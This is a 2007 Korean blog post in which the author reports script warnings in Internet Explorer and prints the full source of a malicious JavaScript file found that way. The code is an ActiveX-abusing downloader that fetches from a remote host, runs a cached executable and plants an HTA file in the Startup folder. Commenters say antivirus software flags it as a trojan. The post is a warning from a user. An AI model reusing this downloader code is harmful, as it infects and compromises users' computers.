태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

반응형
마전에 인터넷 익스플로러를 실행시켜서 네이버에 접속을 했는데 갑자기 스크립트 경고가 나왔습니다. 일단 다운 받기하고 열기가 있어서 다운을 받아 보니 js(java script)파일이네요 내용을 봐서 대충 뭐 URL을 찾아봤더니 http://news.163-stv.com/page/image/Downer.html 의 주소가있어서 대충 뉴스가 있는 것을 보니 네이버에 메인화면엔 뉴스가 나오니까 하고 그냥 넘어갔습니다.


늘 다른 사이트를 열었는데 다시 스크립트 경고가 나오네요 이번엔 네이버도 아니구 티스토리 인지라 무엇인가 이상해서 다시 전에 받아뒀던 스크립트 파일을 열어보았습니다. 익스플로러를 이용해서 페이지를 생성하고 하는 악성코드였네요 코드 내용은 아래와 같아요


var Good_fan = null;

function shit()

{

try{Good_fan = new ActiveXObject("\x54\x68\x75\x6E\x64\x65\x72\x53\x65\x72\x76\x65\x72\x2E\x77\x65\x62\x54\x68\x75\x6E\x64\x65\x72\x2E\x31");}

catch(e){return;}

var vip;

vip="<script defer> var shell=\"

<html>

<body>

<script>

window.moveTo(4000,4000);window.resizeTo(0,0);

var shell=new ActiveXObject(\\\"wscript.shell\\\");

shell.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE http://news.163-stv.com/page/image/Downer.html\\\",0,0);

function runmm(){var path=shell.SpecialFolders(\\\"MyDocuments\\\");

var china=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));

china+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";

var sp=new ActiveXObject(\\\"shell.application\\\");

var chenzi=sp.NameSpace(china);

for(i=0;

i<chenzi.Items().Count;

i++){var Folder=chenzi.Items().Item(i).path;Folder+=\\\"\\\\\\\\page[1].exe\\\";

try{shell.Exec(Folder);

}catch(e){};

}window.close();

};

shell.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);

runmm();

<\\/script>

</body>

</html>\";

var love = new ActiveXObject(\"ADODB.Recordset\");

love.Fields.Append(\"love\", 200, 3000);love.Open();

love.AddNew();

love.Fields(\"love\").Value=shell;love.Update();

love.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「역迦」꽉데\\\\넋埼\\\\폘땡\\\\Thunder.hta\",0);

love.Close();</script>";

        var ret=Good_fan.AddCateogry(vip);

        Good_fan.SetBrowserWindowSize(0,0,400,300);

        var strps = Good_fan.GetServerPath();

        strps = strps.substr(0, strps.length-1);

        strps+="\\page\\index.htm";

        Good_fan.SetBrowserWindowData(strps,"love");

        Good_fan.HideBrowserWindow(1);

        return;

}


단 위에 있는 URL에 중국어 폰트가 설치 되지 않아서 문자는 나오지 않지만 중국어가 짐작되는 이상한 사이트로 연결 되는군요 내용을 스크립트 내용두 자세히는 모르겠지만 확실히 악성 코드 같군요


2007.09.18 -프미케-

반응형

Posted by 프미케

댓글을 달아 주세요

  1. BlogIcon Evelina 2007.09.22 16:42 신고  댓글주소  수정/삭제  댓글쓰기

    러브바이러스? 훔....바이러스나 악성코드 냄새가 물씬풍기는 것처럼 보이네요.

    • BlogIcon 프미케 2007.09.23 20:15 신고  댓글주소  수정/삭제

      우와 안녕하세요? evelina님 정말 오랬만이예요 이거 저두 사이트 접속해보구 깜짤놀라서 백신으로 삭 스캔했는데 다운받은 js파일두 trojan.downloadloder이라는 이름으로 잡혀버리네요

  2. BlogIcon taion 2007.09.23 04:38  댓글주소  수정/삭제  댓글쓰기

    훔냥.. 글 보고 들어가 보았는데 -_-;;
    중국에서 나름대로 포탈 이라고 불리우는 싸이트중 http://www.163.com/ 이라는 곳이 있는데
    거기 이름을 흉내내서 만든 바이러스 와 악성코드 를 잔뜩 심어놓은 >.< 곳 이군요

    스냅샷을 올리는게 좋을것 이라고 생각은 했지만 서도;;
    구동중인 시만텍 놀튼 이 자꾸 바이러스 와 안좋은 코드파일이 있다고 창을 띄우는 바람에
    글만 올립니다

    아무쪼록 안착한 아이들이 많이 있네요 ㅋ
    그나저나 어디 가셨3? @@

    • BlogIcon 프미케 2007.09.23 20:16 신고  댓글주소  수정/삭제

      스크립트에서 URL따라갔더니 난데없이 이상한 사이트로 들어가버리더라구요 쩝 정말 이젠 사이트하구 자바스크립트까지 주의해야하는 시대가 왔어요